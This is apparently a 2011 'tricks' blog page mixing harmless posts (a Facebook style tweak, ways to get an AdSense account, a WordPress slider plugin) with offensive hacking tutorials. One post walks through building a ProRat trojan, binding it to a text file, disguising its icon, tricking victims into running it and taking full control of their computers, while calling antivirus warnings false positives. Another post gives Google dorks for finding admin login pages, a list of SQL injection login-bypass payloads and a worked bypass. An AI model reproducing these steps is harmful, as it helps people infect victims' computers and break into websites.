Latest Post
Showing posts sorted by relevance for query facebook trick. Sort by date Show all posts
Showing posts sorted by relevance for query facebook trick. Sort by date Show all posts

How to change facebook style New Trick(Facebook)

Hello Frndz i am hamid ashraf
today i am posted..facebook new style trick

1.download facebook style 

download now

install now

so 1 you go it





click to any pic...nd see it



thanksss.....:D


 

How to Hack facebook account and Gmail account using Backtrack 5 (Facebook Trick)




 

7 Ways to Create an Adsense Account without Having a Website(How-tos)


Google AdSense is one of the most popular way to make money from Internet by displaying ads on your web pages. Google AdSense was launched on June 18, 2003 and today there are millions of Google AdSense publishers. Google easily approves AdSense accounts in most of countries but in few countries Google hardly approve AdSense applications. The reason is, applying for an Adsense account through low quality-content websites. If you are having a website, then you must know how to create an adsense account successfully within few hours. However, you can get an AdSense account even without owning a website.


Many people are selling AdSense account by using trick to Create AdSense account immediately. Actually there is no trick behind creating an Adsense account. They just make people fool by creating AdSense account via other websites. Other websites mean those websites who have revenue sharing system. Following are 7 websites which allows you to create an AdSense account. You don't have to pay them for this, just create an account there and apply for your AdSense account.

1- Blogger.com

Blogger.com (also known as blogspot.com) is a free blogging service from Google Inc. This is just like creating a free website on a sub-domain.Blogger gives you huge space to upload your text contents and pictures plus gives you so many templates with customization option. Just go to Blogger.com, create your blog, post some unique articles and Apply for an AdSense account through their Monetize tab.
Link: http://www.blogger.com/

2- Hubpages.com

Hubpages is a website where people post their articles and get paid out of it. Hubpages is a revenue sharing website where you can share your article on any subject and they will pay you for this. You can apply for an AdSense account via their Revenue share system.
Link: http://www.hubpages.com

3- Flixya.com

Flixya is another way to create an AdSense account. Flixya is a website to share pictures, videos and blogs and it is powered by Google AdSense itself so there are higher chances of AdSense account approval. Simply signup for an account at Flixya, upload 10 ore more pictures, create a blog and apply for an AdSense account.
Link: http://www.flixya.com

4- Docstoc

Its really simple and easy to create an AdSense via Docstoc. Go to Docstoc, upload few documents there such as txt, doc or presentation files. But make sure those files contain some well written form. Simply go to Docstoc, create an account, upload few docs and apply for an AdSense account.
Link: http://www.docstoc.com/

5- BloggerParty

This is yet another revenue sharing website. It works like Hubpages. All you have to do is create an account there, share your experience there. When you signup for an account, you will see an option to signup for Google AdSense account through them. Select that option and you will get an account successfully.
Link: http://www.bloggerparty.com/

6- IndyaRocks

This is a social network almost like Facebook. Here you can make friends, update your status, share pictures etc. First of all, create an account there and complete your profile. Write 5 blogs at least and when you have done with it simply apply for an Adsense account application.
Link: http://www.indyarocks.com/

7- Webanswers

Webanswers.com is just like Yahoo! Answers. People ask questions on various topics and others can answer this. You can get an AdSense account from this website also. Simply go to this website, post answers to some questions.
Link: http://www.webanswers.com/


 

ProRAT(Hacking Trick)

To show you an example of a malicious program, I will use a well known Windows Trojan, ProRat using a Rat tool you can hack any email account in world facebook, yahoo,gmail,..etc.

1. Download ProRat. Once it is downloaded right click on the folder and choose to extract it. antivirus wil detect it as trojan but it is a false positive detection.
2. Open up the program. You should see the following:

3. Next we will create the actual Trojan file. Click on Create and choose Create ProRat Server. 


4. Next put in your IP address so the server could connect to you. If you don’t know your IP address click on the little arrow to have it filled in for you automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options. 


5. Click on the General Settings button to continue. Here we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.
6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. In the example I will use an ordinary text document. 
7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I will stick with the default because it has icon support, but exe’s looks suspicious so it would be smart to change it. 
8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document. 



9. Finally click on Create Server to, you guessed it, create the server file. Below is what my server file looks like.

10. A hacker would probably rename it to something like “Funny Joke” and send it as an attachment to some people. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it. 
11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next. 
12. I’m going to run the server on my own computer to show you what would happen. Once I run it the trojan will be installed onto my computer in the background. The hacker would then get a message telling him that I was infected. He would then connect to my computer by typing in my IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to my computer and have full control over it. 


13. Now the hacker has a lot of options to choose from as you can see on the right. He has access to all my computer files, he can shut down my pc, get all the saved passwords off my computer, send a message to my computer, format my whole hard drive, take a screen shot of my computer, and so much more. Below I’ll show you a few examples 


14. The image below shows the message I would get on my screen if the hacker chose to message me. 


15. Below is an image of my task bar after the hacker clicks on Hide Start Button. 


16. Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen.

As you saw in the above example, a hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan so if the victim has an anti-virus program installed he most likely won’t get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.


 

Add Recommended Post Slide To Wordpress Instead Of Simplereach Slide (Wordpress trick)



Few months ago simplereach introduced a recommended post slide for both Blogger and wordpress. They stopped their service. They no longer offer to upload Blogger template to their server to show the slide. But This problem already fixed for blogger with the invention of a code, generated by bloggerplugin. I already posted on How To Add Recommended Post Slider To Blogger. The simplereach wordpress plugin is disable for new users. You cant make api key though simplereach now. Moreover it has some limitations also. New bloggers wishing to use simplereach slide, are not being able to taste the service to increase page view anymore, on wordpress. Only old member of simplereach are using this service. I was looking for an alternative of simplereach slide. And i am happy that i found it. It is nRelate Flyout. Actually the simplereach slide with facebook like button, twitter button and default beautiful CSS was great. As it is no more available so we have to move on new alternative like nRelate Flyout




Download the plugin

Recommended Post Slide To Wordpress And Blogger Instead Of Simplereach Slide
Advantages Of nRelate Flyout


1. Best Alternative Of Simplereach Slide

2.Increase Page view daily

3.Reduce Bounce Rate

4.Earning Offer By their Ad Network

5.Keep Your Smooth And Do Not Make Slow

6.Customization Options For Custom CSS

7.Adding Additional Thumbnail And Many More

Installation On Blogger
Installation On Wordpress
  • Download the plugin.[already given download link] and go to plugin settings from dashboard. Ok it's done
  • Now wait 10 minute and see the awesome recommended post slider
Please share with your friends if you like and thank you for reading the article


 

Hack any site(Hacking Trick)

Hello Readers, Today I am sharing with you how to exploit web application by SQL Injection Attack. In this post step by step I show you how to bypass admin login using some queries.
What is SQL Injection?
SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
Step-by-Step tutorial for SQL Injection                          
  
[Step – 1] Find SQL Injection Vulnerable Website
First we need vulnerable site to the attack. This is the first step in SQL injection exploitation and like every other hacking attack is the most time consuming, and is the only time consuming step.
1) By Google Dork
Google dorks are the center of the Google Hacking. Google database is the biggest so hackers use to exploit that database by using various search engine commands or complex search queries to locate sensitive data and vulnerable devices on the internet. For Example use this Google Dork to find randomly vulnerable website for SQL injection.
There is a large number of Google dork for basic SQL injection. Here is the best:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administratorlogin.asp
inurl:login/administrator.asp
inurl:administrator_login.asp
\
2) By Automated Tools
Today many tools are available for found a vulnerable site. Tools make works easy and saving our time. Admin Page Finding tools which scans the vulnerable websites for administrator login pages. It makes use of a predefined list for finding the admin login pages. After finding the pages, it may present us the page on which we can login with the administrator password. “Actually finding admin page is nothing but just a directory of a particular website“.
You can use Admin Finder Script (Perl Script) . I share this script in my previous post. You can get this script and see the tutorial.
[Step - 2] SQL Injection Queries
Here is some popular SQL injection queries list. We can use these to bypass login authentication. These queries confuse the databases.
‘or’’=’
admin'--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 -- 
[Step – 3] Exploitation Web Applications by SQL Injection
After find admin page of any vulnerable web application. We can exploit that vulnerable web application using client supplied SQL queries. Its enable to execute unauthorized SQL commands.
For example, when a user logs onto a webpage by using user name and password for validation, a SQL query is used there. However an attacker can use SQL\ injection to send specially crafted username and password fields that poison the original SQL queries.
Let’s see an example that illustrates this kind of attack so that we can fully understand how it works. We have a sql vulnerable website
http://demo.testfire.net/bank/login.aspx .
We found an SQL injection point for exploitation. In the image below we can see login page or user authentication form of this web site.
Click Her To See This Page
www.demo.testfire.net has an authentication form for accessing the administration part of its Website. The authentication requires the user to enter a valid username and password. After sending a username and password, the application sends a query to the database to validate the user. 
The query has the following format:
SELECT *
FROM admin
WHERE username = '[USER ENTRY]' AND password = '[USER ENTRY]'
The application doesn’t perform any sanitization of the received data, and therefore we have full control over what we send to the server. The authentication form requests a username and a password from the user. If we enter any random username and password the result page shows an “Invalid username or password” message.
The authentication requires the user to enter a valid username and password. We don’t know the valid user name and password. We inject here some SQL queries to bypass login. In username filed we type admin as a username and in password filed we set “or”=”
The query has the following format:
SELECT *
FROM admin
WHERE username = 'admin' AND password = '’or’’=’'

If the query runs successfully we will bypass the login without knowing username and password. In the below Image we can see we bypass login and we use admin panel as an administrator. We manage website contains as we want.
* In My next post we will discuss about Blind SQL Injection.
If you like this post then kindly Share with your friends and groups and
Thank You For Visiting.....


 
 

Copyright © 2011. Tricks Duniya - All Rights Reserved